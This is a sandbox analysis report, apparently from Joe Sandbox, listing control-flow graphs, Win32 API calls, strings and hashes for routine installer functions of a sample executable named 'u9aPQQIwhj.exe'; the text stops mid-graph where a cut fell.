                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  • Opcode ID: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
                                                  • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                                                  • Opcode Fuzzy Hash: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
                                                  • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 412 405f0a-405f15 413 405f17-405f26 412->413 414 405f28-405f3e 412->414 413->414 415 405f44-405f51 414->415 416 406156-40615c 414->416 415->416 419 405f57-405f5e 415->419 417 406162-40616d 416->417 418 405f63-405f70 416->418 420 406178-406179 417->420 421 40616f-406173 call 405ee8 417->421 418->417 422 405f76-405f82 418->422 419->416 421->420 424 406143 422->424 425 405f88-405fc4 422->425 426 406151-406154 424->426 427 406145-40614f 424->427 428 4060e4-4060e8 425->428 429 405fca-405fd5 GetVersion 425->429 426->416 427->416 432 4060ea-4060ee 428->432 433 40611d-406121 428->433 430 405fd7-405fdb 429->430 431 405fef 429->431 430->431 434 405fdd-405fe1 430->434 437 405ff6-405ffd 431->437 435 4060f0-4060fc call 405e2f 432->435 436 4060fe-40610b call 405ee8 432->436 438 406130-406141 lstrlenW 433->438 439 406123-40612b call 405f0a 433->439 434->431 440 405fe3-405fe7 434->440 450 406110-406119 435->450 436->450 442 406002-406004 437->442 443 405fff-406001 437->443 438->416 439->438 440->431 446 405fe9-405fed 440->446 448 406040-406043 442->448 449 406006-40602c call 405db5 442->449 443->442 446->437 453 406053-406056 448->453 454 406045-406051 GetSystemDirectoryW 448->454 461 406032-40603b call 405f0a 449->461 462 4060cb-4060cf 449->462 450->438 452 40611b 450->452 459 4060dc-4060e2 call 40617c 452->459 456 4060c1-4060c3 453->456 457 406058-406066 GetWindowsDirectoryW 453->457 455 4060c5-4060c9 454->455 455->459 455->462 456->455 460 406068-406072 456->460 457->456 459->438 465 406074-406077 460->465 466 40608c-4060a2 SHGetSpecialFolderLocation 460->466 461->455 462->459 468 4060d1-4060d7 lstrcatW 462->468 465->466 469 406079-406080 465->469 470 4060a4-4060bb SHGetPathFromIDListW CoTaskMemFree 466->470 471 4060bd 466->471 468->459 473 406088-40608a 469->473 470->455 470->471 471->456 473->455 473->466
                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 00405FCD
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604B
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 0040605E
                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                                                  • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060A8
                                                  • CoTaskMemFree.OLE32(?), ref: 004060B3
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 00406131
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 900638850-1064546216
                                                  • Opcode ID: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
                                                  • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                                                  • Opcode Fuzzy Hash: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
                                                  • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 673 405770-405796 call 405a3b 676 405798-4057aa DeleteFileW 673->676 677 4057af-4057b6 673->677 678 40592c-405930 676->678 679 4057b8-4057ba 677->679 680 4057c9-4057d9 call 405ee8 677->680 681 4057c0-4057c3 679->681 682 4058da-4058df 679->682 686 4057e8-4057e9 call 40597f 680->686 687 4057db-4057e6 lstrcatW 680->687 681->680 681->682 682->678 685 4058e1-4058e4 682->685 688 4058e6-4058ec 685->688 689 4058ee-4058f6 call 40622b 685->689 691 4057ee-4057f2 686->691 687->691 688->678 689->678 697 4058f8-40590c call 405933 call 405728 689->697 694 4057f4-4057fc 691->694 695 4057fe-405804 lstrcatW 691->695 694->695 696 405809-405825 lstrlenW FindFirstFileW 694->696 695->696 698 40582b-405833 696->698 699 4058cf-4058d3 696->699 713 405924-405927 call 405192 697->713 714 40590e-405911 697->714 701 405853-405867 call 405ee8 698->701 702 405835-40583d 698->702 699->682 704 4058d5 699->704 715 405869-405871 701->715 716 40587e-405889 call 405728 701->716 705 4058b2-4058c2 FindNextFileW 702->705 706 40583f-405847 702->706 704->682 705->698 712 4058c8-4058c9 FindClose 705->712 706->701 709 405849-405851 706->709 709->701 709->705 712->699 713->678 714->688 717 405913-405922 call 405192 call 405d82 714->717 715->705 718 405873-40587c call 405770 715->718 724 4058aa-4058ad call 405192 716->724 725 40588b-40588e 716->725 717->678 718->705 724->705 728 405890-4058a0 call 405192 call 405d82 725->728 729 4058a2-4058a8 725->729 728->705 729->705
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 00405799
                                                  • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 004057E1
                                                  • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 00405804
                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 0040580A
                                                  • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 0040581A
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                                                  • FindClose.KERNEL32(00000000), ref: 004058C9
                                                  Strings
                                                  • \*.*, xrefs: 004057DB
                                                  • "C:\Users\user\Desktop\u9aPQQIwhj.exe", xrefs: 00405779
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\u9aPQQIwhj.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-2939535997
                                                  • Opcode ID: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
                                                  • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                                                  • Opcode Fuzzy Hash: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
                                                  • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 737 401752-401777 call 402b38 call 4059aa 742 401781-401793 call 405ee8 call 405933 lstrcatW 737->742 743 401779-40177f call 405ee8 737->743 748 401798-401799 call 40617c 742->748 743->748 752 40179e-4017a2 748->752 753 4017a4-4017ae call 40622b 752->753 754 4017d5-4017d8 752->754 761 4017c0-4017d2 753->761 762 4017b0-4017be CompareFileTime 753->762 756 4017e0-4017fc call 405b54 754->756 757 4017da-4017db call 405b2f 754->757 764 401870-401899 call 405192 call 403060 756->764 765 4017fe-401801 756->765 757->756 761->754 762->761 778 4018a1-4018ad SetFileTime 764->778 779 40189b-40189f 764->779 767 401852-40185c call 405192 765->767 768 401803-401841 call 405ee8 * 2 call 405f0a call 405ee8 call 4056c4 765->768 780 401865-40186b 767->780 768->752 799 401847-401848 768->799 782 4018b3-4018be CloseHandle 778->782 779->778 779->782 783 4029ce 780->783 786 4018c4-4018c7 782->786 787 4029c5-4029c8 782->787 785 4029d0-4029d4 783->785 789 4018c9-4018da call 405f0a lstrcatW 786->789 790 4018dc-4018df call 405f0a 786->790 787->783 796 4018e4-402241 call 4056c4 789->796 790->796 796->785 799->780 801 40184a-40184b 799->801 801->767
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens\Trskelen,?,?,00000031), ref: 00401793
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens\Trskelen,?,?,00000031), ref: 004017B8
                                                    • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                    • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                    • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll), ref: 004051FF
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsh4048.tmp$C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll$C:\Users\user\Uploadable\normallnnens\Trskelen$Call
                                                  • API String ID: 1941528284-112293408
                                                  • Opcode ID: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
                                                  • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                                                  • Opcode Fuzzy Hash: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
                                                  • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                  • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                                                  • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                  • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00406236
                                                  • FindClose.KERNEL32(00000000), ref: 00406242
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: WB
                                                  • API String ID: 2295610775-2854515933
                                                  • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                  • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                                                  • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                  • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                  • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                  • String ID:
                                                  • API String ID: 310444273-0
                                                  • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                  • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
                                                  • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                  • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 167 4038b2-4038ca call 406252 170 4038cc-4038dc call 405e2f 167->170 171 4038de-403915 call 405db5 167->171 179 403938-403961 call 403b88 call 405a3b 170->179 176 403917-403928 call 405db5 171->176 177 40392d-403933 lstrcatW 171->177 176->177 177->179 185 4039f3-4039fb call 405a3b 179->185 186 403967-40396c 179->186 192 403a09-403a2e LoadImageW 185->192 193 4039fd-403a04 call 405f0a 185->193 186->185 187 403972-40398c call 405db5 186->187 191 403991-40399a 187->191 191->185 194 40399c-4039a0 191->194 196 403a30-403a60 RegisterClassW 192->196 197 403aaf-403ab7 call 40140b 192->197 193->192 201 4039b2-4039be lstrlenW 194->201 202 4039a2-4039af call 405960 194->202 198 403a66-403aaa SystemParametersInfoW CreateWindowExW 196->198 199 403b7e 196->199 209 403ac1-403acc call 403b88 197->209 210 403ab9-403abc 197->210 198->197 206 403b80-403b87 199->206 203 4039c0-4039ce lstrcmpiW 201->203 204 4039e6-4039ee call 405933 call 405ee8 201->204 202->201 203->204 208 4039d0-4039da GetFileAttributesW 203->208 204->185 213 4039e0-4039e1 call 40597f 208->213 214 4039dc-4039de 208->214 220 403ad2-403aef ShowWindow LoadLibraryW 209->220 221 403b55-403b56 call 405265 209->221 210->206 213->204 214->204 214->213 223 403af1-403af6 LoadLibraryW 220->223 224 403af8-403b0a GetClassInfoW 220->224 225 403b5b-403b5d 221->225 223->224 226 403b22-403b45 DialogBoxParamW call 40140b 224->226 227 403b0c-403b1c GetClassInfoW RegisterClassW 224->227 228 403b77-403b79 call 40140b 225->228 229 403b5f-403b65 225->229 233 403b4a-403b53 call 403802 226->233 227->226 228->199 229->210 231 403b6b-403b72 call 40140b 229->231 231->210 233->206
                                                  APIs
                                                    • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                    • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                    • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                  • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 00403933
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                                                  • GetFileAttributesW.KERNEL32(Call), ref: 004039D1
                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\Uploadable\normallnnens), ref: 00403A1A
                                                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                  • RegisterClassW.USER32(00428180), ref: 00403A57
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                                                  • RegisterClassW.USER32(00428180), ref: 00403B1C
                                                  • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\u9aPQQIwhj.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Uploadable\normallnnens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 914957316-3479907822
                                                  • Opcode ID: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
                                                  • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                                                  • Opcode Fuzzy Hash: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
                                                  • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 238 403c55-403c67 239 403da8-403db7 238->239 240 403c6d-403c73 238->240 242 403e06-403e1b 239->242 243 403db9-403e01 GetDlgItem * 2 call 40412d SetClassLongW call 40140b 239->243 240->239 241 403c79-403c82 240->241 244 403c84-403c91 SetWindowPos 241->244 245 403c97-403c9a 241->245 247 403e5b-403e60 call 404179 242->247 248 403e1d-403e20 242->248 243->242 244->245 250 403cb4-403cba 245->250 251 403c9c-403cae ShowWindow 245->251 257 403e65-403e80 247->257 253 403e22-403e2d call 401389 248->253 254 403e53-403e55 248->254 258 403cd6-403cd9 250->258 259 403cbc-403cd1 DestroyWindow 250->259 251->250 253->254 269 403e2f-403e4e SendMessageW 253->269 254->247 256 4040fa 254->256 264 4040fc-404103 256->264 262 403e82-403e84 call 40140b 257->262 263 403e89-403e8f 257->263 267 403cdb-403ce7 SetWindowLongW 258->267 268 403cec-403cf2 258->268 265 4040d7-4040dd 259->265 262->263 272 403e95-403ea0 263->272 273 4040b8-4040d1 DestroyWindow EndDialog 263->273 265->256 270 4040df-4040e5 265->270 267->264 274 403d95-403da3 call 404194 268->274 275 403cf8-403d09 GetDlgItem 268->275 269->264 270->256 279 4040e7-4040f0 ShowWindow 270->279 